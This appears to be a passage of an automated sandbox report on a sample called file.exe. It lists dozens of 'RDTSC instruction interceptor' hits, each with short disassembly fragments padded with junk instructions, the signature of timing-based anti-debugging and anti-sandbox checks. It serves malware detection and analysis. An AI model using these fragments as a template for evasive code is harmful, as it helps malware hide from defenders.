                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9EE5 second address: BF9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA199 second address: BFA19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA19E second address: BFA200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx ecx, cx 0x0000000d push 0000001Eh 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F0F34BEC148h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push eax 0x0000002a mov edx, dword ptr [ebp+122D3EF0h] 0x00000030 pop edi 0x00000031 push eax 0x00000032 push ebx 0x00000033 pushad 0x00000034 jmp 00007F0F34BEC151h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA39F second address: BFA3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA3A3 second address: BFA3A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA65F second address: BFA6F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F345319EFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 jo 00007F0F345319E6h 0x0000001c pop edx 0x0000001d popad 0x0000001e nop 0x0000001f mov edx, 15C23500h 0x00000024 lea eax, dword ptr [ebp+1247DFB2h] 0x0000002a push eax 0x0000002b jns 00007F0F345319FBh 0x00000031 mov dword ptr [esp], eax 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F0F345319E8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e sub dl, FFFFFFFEh 0x00000051 lea eax, dword ptr [ebp+1247DF6Eh] 0x00000057 and ecx, dword ptr [ebp+122D3CD4h] 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F0F345319F6h 0x00000065 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA6F7 second address: BFA71E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F0F34BEC153h 0x00000012 jmp 00007F0F34BEC14Dh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA71E second address: BFA723 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33E0D second address: C33E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0F34BEC146h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33E17 second address: C33E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0F345319E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33E23 second address: C33E50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC156h 0x00000007 jng 00007F0F34BEC148h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jbe 00007F0F34BEC14Eh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C342E0 second address: C34301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F345319F0h 0x00000008 jbe 00007F0F345319E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34477 second address: C34488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Dh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34488 second address: C3448C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C346F6 second address: C3470E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007F0F34BEC146h 0x0000000d ja 00007F0F34BEC146h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3470E second address: C3472E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F0F345319E6h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3472E second address: C34738 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34738 second address: C34756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EEh 0x00000009 jmp 00007F0F345319ECh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C348CA second address: C348E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F0F34BEC15Ch 0x0000000c jmp 00007F0F34BEC150h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3651A second address: C3651F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3651F second address: C36542 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F34BEC156h 0x00000008 pushad 0x00000009 je 00007F0F34BEC146h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3D11F second address: C3D125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3D125 second address: C3D129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41830 second address: C41843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F345319E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F0F345319E6h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41843 second address: C41849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40F9C second address: C40FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40FA0 second address: C40FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40FA4 second address: C40FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40FB0 second address: C40FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC157h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40FCB second address: C40FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4223E second address: C42249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C447C9 second address: C447E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0F345319EDh 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C447E7 second address: C44803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Fh 0x00000009 popad 0x0000000a jo 00007F0F34BEC148h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4761A second address: C4763B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0F345319E6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0F345319EDh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4763B second address: C47647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47647 second address: C47654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F0F345319E6h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C471A3 second address: C471F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 jmp 00007F0F34BEC14Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F0F34BEC150h 0x00000015 pop ebx 0x00000016 jnc 00007F0F34BEC162h 0x0000001c jmp 00007F0F34BEC156h 0x00000021 jbe 00007F0F34BEC146h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C471F2 second address: C471F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B1E9 second address: C4B20E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0F34BEC14Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E934 second address: C4E938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E938 second address: C4E93E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4EAC2 second address: C4EAC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4EAC8 second address: C4EACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4EDC6 second address: C4EDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546BD second address: C546C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546C3 second address: C546D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0F345319E6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546D2 second address: C546D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546D8 second address: C546F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319F6h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546F2 second address: C546FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C549AB second address: C549B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C549B2 second address: C549C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55695 second address: C5569B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5569B second address: C556D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007F0F34BEC146h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F0F34BEC158h 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a push edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C556D0 second address: C556D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D7E3 second address: C5D7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B7D7 second address: C5B803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F5h 0x00000007 push esi 0x00000008 jmp 00007F0F345319EBh 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B803 second address: C5B809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B809 second address: C5B835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0F345319EDh 0x0000000a pushad 0x0000000b jmp 00007F0F345319F7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B99C second address: C5B9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0F34BEC153h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B9B5 second address: C5B9BF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B9BF second address: C5B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C0C3 second address: C5C0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C0C7 second address: C5C0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C66C second address: C5C687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C612E7 second address: C612EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C612EC second address: C61310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F7h 0x00000009 pop edi 0x0000000a je 00007F0F345319ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C606DB second address: C606E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6084F second address: C60867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60D6D second address: C60D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60D73 second address: C60D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60D79 second address: C60D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6103A second address: C6103E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6103E second address: C61048 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61048 second address: C6105D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EFh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B19D second address: C6B1C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F0F34BEC15Eh 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B1C7 second address: C6B1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 ja 00007F0F345319E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B319 second address: C6B31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B65D second address: C6B663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B976 second address: C6B982 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F0F34BEC146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BACC second address: C6BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BAD2 second address: C6BADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BADF second address: C6BAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0F345319E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BEFB second address: C6BEFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C755 second address: C6C75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C75B second address: C6C75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C75F second address: C6C765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C765 second address: C6C76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C818C6 second address: C818D9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F345319E6h 0x00000008 jns 00007F0F345319E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C86161 second address: C86177 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F34BEC146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F0F34BEC146h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C862C9 second address: C862E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0F345319ECh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C856 second address: C8C85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C947EF second address: C94818 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F345319EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F0F345319FDh 0x00000010 jmp 00007F0F345319EDh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C946A3 second address: C946A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D9FF second address: C9DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DA03 second address: C9DA29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC152h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0F34BEC148h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DD69 second address: C9DD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
